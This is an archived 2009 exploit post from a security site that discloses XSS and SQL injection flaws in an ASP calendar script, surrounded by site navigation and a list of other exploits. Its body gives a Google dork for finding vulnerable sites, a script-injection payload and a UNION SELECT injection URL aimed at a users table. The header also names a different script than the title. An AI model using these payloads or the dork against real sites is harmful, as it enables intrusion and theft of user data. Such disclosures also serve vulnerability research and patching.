首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
ASP Inline Corporate Calendar (SQL/XSS) Multiple Remote Vulnerabilities
来源:vfocus.net 作者:vfocus 发布时间:2009-05-22  
000000  00000     0000    0000  000  00 000000  0000000   0000  000000  00000
 0    0   0      0    0  0    0  0   0   0    0  0    0  0    0  0    0  0   0
 0    0   0     0  00 0 0        0  0    0    0  0      0  00 0  0    0  0    0
 0    0   0     0 0 0 0 0        0  0    0    0  0  0   0 0 0 0  0    0  0    0
 00000    0     0 0 0 0 0        0 0     00000   0000   0 0 0 0  00000   0    0
 0    0   0     0 0 0 0 0        000     0    0  0  0   0 0 0 0  0  0    0    0
 0    0   0     0  000  0        0  0    0    0  0      0  000   0  0    0    0
 0    0   0   0  0       0    0  0   0   0    0  0    0  0       0   0   0   0
000000  0000000   000     0000  000  00 000000  0000000   000   000  00 00000

[+] Script               : ASP Talk 

[+] Exploit Type         : Multiple Exploits (SQL/CSS)

[+] Google Dork          : intitle:"ASP inline corporate calendar"          inurl:.asp?id=

[+] Contact              : blackbeard-sql A.T hotmail.fr 

--//--> Exploit : 

1)Cross site scripting :


post = <script>alert('Bl@clbe@rD Is Here');</script>

2) Remote sql injection Exploit :

http://[website]/[script]/active_appointments.asp?sortby=Event_Title&order=DESC+union+select+(number of columns)+from+users

[peace xD]

# [2009-05-21]

[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·VICIDIAL 2.0.5-173 (Auth Bypas
·BaoFeng (config.dll) ActiveX R
·Microsoft IIS 6.0 WebDAV Remot
·ChinaGames (CGAgent.dll) Activ
·Mac OS X Java applet Remote De
·Flash Quiz Beta 2 Multiple Re
·Jorp Remote Arbitrar
·Job Script 2.0 Arbitrary Shell
·bSpeak 1.10 (forumid) Remote B
·Article Directory (Auth Bypass
·PHP Article Publisher Arbitrar
·Microsoft IIS 6.0 WebDAV Remot
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved